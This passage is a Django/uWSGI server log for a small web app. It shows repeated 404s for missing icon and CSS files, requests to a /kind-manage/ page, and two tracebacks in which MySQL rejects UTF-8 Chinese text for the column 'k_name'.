/static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1041/1342] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:05:47 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1042/1343] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:05:47 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1043/1344] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:05:47 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1044/1345] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:05:47 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1045/1346] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:05:47 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 16 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1046/1347] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:05:47 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1047/1348] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:05:47 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1048/1349] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:05:47 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\xB0\\x8F\\xE6\\x9C\\x8B...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\xB0\\x8F\\xE6\\x9C\\x8B...' for column 'k_name' at row 1") +[pid: 11057|app: 0|req: 1049/1350] 219.228.146.156 () {48 vars in 1029 bytes} [Thu Jan 14 09:05:55 2021] POST /kind-manage/? => generated 206936 bytes in 100 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1050/1351] 219.228.146.156 () {40 vars in 935 bytes} [Thu Jan 14 09:05:55 2021] GET /kind-manage/? => generated 7366 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 28158] hr_write(): Broken pipe [plugins/http/http.c line 565] +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1051/1352] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:05:56 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1052/1353] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:05:56 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1053/1354] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:05:56 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1054/1355] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:05:56 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1055/1356] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:05:56 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1056/1357] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:05:56 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 23 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1057/1358] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:05:56 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1058/1359] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:05:56 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1059/1360] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:05:56 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1060/1361] 219.228.146.156 () {48 vars in 1029 bytes} [Thu Jan 14 09:05:58 2021] POST /kind-manage/? => generated 27 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 11057|app: 0|req: 1061/1362] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 09:06:00 2021] GET /kind-manage/ => generated 8296 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1062/1363] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:06:00 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1064/1364] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:06:00 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 44 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1065/1365] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:06:00 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1066/1366] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:00 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1067/1367] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:00 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1068/1368] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:06:00 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 96 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1068/1369] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:06:00 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1069/1370] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:06:00 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1070/1371] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:06:00 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1071/1372] 219.228.146.156 () {48 vars in 1027 bytes} [Thu Jan 14 09:06:06 2021] POST /kind-manage/ => generated 27 bytes in 37 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1072/1373] 219.228.146.156 () {40 vars in 933 bytes} [Thu Jan 14 09:06:06 2021] GET /kind-manage/ => generated 7366 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1073/1374] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:06:08 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1074/1375] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:06:08 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1075/1376] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:06:08 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1076/1377] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:06:08 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1077/1378] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:08 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1078/1379] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:08 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1079/1380] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:06:08 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1080/1381] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:06:08 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1081/1382] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:06:08 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1083/1383] 219.228.146.156 () {40 vars in 934 bytes} [Thu Jan 14 09:06:16 2021] GET /kind-manage/? => generated 7366 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD...' for column 'k_name' at row 1") +[pid: 11057|app: 0|req: 1083/1384] 219.228.146.156 () {48 vars in 1027 bytes} [Thu Jan 14 09:06:16 2021] POST /kind-manage/ => generated 207096 bytes in 113 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 40958] hr_write(): Broken pipe [plugins/http/http.c line 565] +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1084/1385] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:06:17 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1085/1386] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:06:17 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1086/1387] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:06:17 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1087/1388] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:06:17 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 11057|app: 0|req: 1088/1389] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:17 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 11057|app: 0|req: 1089/1390] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:06:17 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 30 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 11057|app: 0|req: 1090/1391] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:17 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 11057|app: 0|req: 1091/1392] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:06:17 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 11057|app: 0|req: 1092/1393] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:06:17 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1093/1394] 219.228.146.156 () {42 vars in 965 bytes} [Thu Jan 14 09:06:22 2021] GET /kind-manage/? => generated 7366 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 11057|app: 0|req: 1094/1395] 219.228.146.156 () {42 vars in 965 bytes} [Thu Jan 14 09:06:28 2021] GET /kind-manage/? => generated 7366 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 11057|app: 0|req: 1095/1396] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:06:30 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 11057|app: 0|req: 1096/1397] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:06:30 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 11057|app: 0|req: 1097/1398] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:06:30 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 11057|app: 0|req: 1098/1399] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:06:30 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: 